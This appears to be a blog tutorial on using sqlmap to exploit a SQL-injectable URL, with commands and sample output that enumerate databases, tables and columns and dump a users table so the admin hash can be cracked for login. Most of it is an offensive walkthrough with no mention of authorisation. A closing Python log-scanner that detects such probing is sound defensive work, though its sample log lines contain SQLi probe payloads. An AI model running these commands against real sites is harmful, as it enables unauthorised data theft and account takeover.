SQLmap is a wonderful tool for taking the dirty work out of your SQL Injection endeavors. Here is the quick and dirty on how to get that Admin Password.
Finding the Databases on the SQL Server
Once you confirm that a remote URL is vulnerable to SQL injection and is exploitable, the next step is to find out the names of the databases that exist on the remote system. The "--dbs" option is used to get the database list.
sqlmap -u "http://www.sitemap.com/section.php?id=51" --dbs
The output could be something like this:
[*] starting at 12:12:56
[12:12:56] [INFO] resuming back-end DBMS ‘mysql’
[12:12:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
blah
blah
blah
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: safecosmetics
available databases [2]:
[*] information_schema
[*] safecosmetics
The output shows the existing databases on the remote system.
Find the Tables in a Particular Database
Now it's time to find out what tables exist in a particular database. Let's say the database of interest here is 'safecosmetics'.
Command:
sqlmap -u "http://www.site.com/section.php?id=51" --tables -D safecosmetics
and the output might be something similar to this:
[11:55:18] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
blah
blah
blah
[11:55:20] [INFO] retrieved: acl_acl
[11:55:21] [INFO] retrieved: acl_acl_sections
blah blah blah more tables
Isn't this amazing? It is, of course! Let's get the columns of a particular table now.
Get the Columns of One of the Tables
Now that we have the list of tables with us, it would be a good idea to get the columns of some important table. Let's say the table is 'users' and it contains the username and password.
sqlmap -u "http://www.site.com/section.php?id=51" --columns -D safecosmetics -T users
The output may be something like this:
[12:17:39] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
blah
blah
blah
[12:17:59] [INFO] retrieved: hash
[12:18:01] [INFO] retrieved: varchar(128)
Database: safecosmetics
Table: users
[8 columns]
+-------------------+--------------+
| Column            | Type         |
+-------------------+--------------+
| email             | text         |
| hash              | varchar(128) |
| id                | int(11)      |
| name              | text         |
| password          | text         |
| permission        | tinyint(4)   |
| system_allow_only | text         |
| system_home       | text         |
+-------------------+--------------+
So now the columns are clearly visible. Good job!
Get Data from a Table
Now comes the most interesting part: extracting the data from the table. The command would be:
sqlmap -u "http://www.site.com/section.php?id=51" --dump -D safecosmetics -T users
The above command will simply dump the data of the particular table, very much like the mysqldump command.
The output might look similar to this:
+----+--------------------+-------+-------+----------+------------+-------------+-------------------+
| id | hash               | name  | email | password | permission | system_home | system_allow_only |
+----+--------------------+-------+-------+----------+------------+-------------+-------------------+
| 1  | 5DIpzzDHFOwnCvPonu | admin | blank | blank    | 3          | blank       | blank             |
+----+--------------------+-------+-------+----------+------------+-------------+-------------------+
The hash column seems to hold the password hash, or at other times it will just hold the password outright. Try cracking the hash and then you would get the login details right away. sqlmap will also write the dumped data to a CSV file for easy analysis.
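The flip side of the walkthrough above is spotting it in your own logs. The following is an added example (not part of the original post and not sqlmap's code): it scans web-server access-log lines for the traffic pattern this enumeration produces against a numeric parameter like section.php?id=51 (SQL syntax or information_schema in the id value, 500 errors from error-based probing, sqlmap's default User-Agent) and counts flagged requests per client IP. The log lines, IPs and the parameter name are constructed assumptions for the example.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qs, urlparse

# Apache/nginx "combined" access-log format (hypothetical sample lines, constructed below).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# SQL syntax that has no business inside a numeric id parameter; information_schema is
# what the page shows sqlmap reading to enumerate databases, tables and columns.
SUSPICIOUS = re.compile(r"information_schema|\bunion\b|\bselect\b|--|/\*|'", re.I)

# Constructed sample: one normal hit, two probes from the same client, one unrelated visitor.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:12:12:57 +0000] "GET /section.php?id=51 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:12:12:58 +0000] "GET /section.php?id=51%27 HTTP/1.1" 500 812 "-" "sqlmap/1.0"',
    '203.0.113.7 - - [10/Oct/2023:12:12:59 +0000] "GET /section.php?id=51+AND+(SELECT+1+FROM+information_schema.tables) HTTP/1.1" 500 812 "-" "sqlmap/1.0"',
    '198.51.100.9 - - [10/Oct/2023:12:13:02 +0000] "GET /section.php?id=7 HTTP/1.1" 200 4990 "-" "Mozilla/5.0"',
]

def classify(line, param="id"):
    """Return the reasons this request looks like automated SQLi probing ([] if it looks clean)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    reasons = set()
    if "sqlmap" in m.group("ua").lower():
        reasons.add("sqlmap user-agent")          # default UA; trivially changed, so never rely on it alone
    for value in parse_qs(urlparse(m.group("url")).query, keep_blank_values=True).get(param, []):
        if not value.isdigit():
            reasons.add(f"non-numeric {param}")   # section.php expects an integer id
        if SUSPICIOUS.search(value):
            reasons.add("sql syntax in parameter")
    if m.group("status") == "500":
        reasons.add("server error (error-based probing)")
    return sorted(reasons)

def summarize(lines, param="id"):
    """Count flagged requests per client IP: a burst from one IP is the sqlmap signature."""
    hits = defaultdict(Counter)
    for line in lines:
        for reason in classify(line, param):
            hits[LOG_RE.match(line).group("ip")][reason] += 1
    return {ip: dict(c) for ip, c in hits.items()}
```

Running summarize(SAMPLE_LOG) reports only 203.0.113.7, with two hits for each reason; the single-request checks in classify are noisy on their own, so alert on the per-IP count rather than on one flagged line.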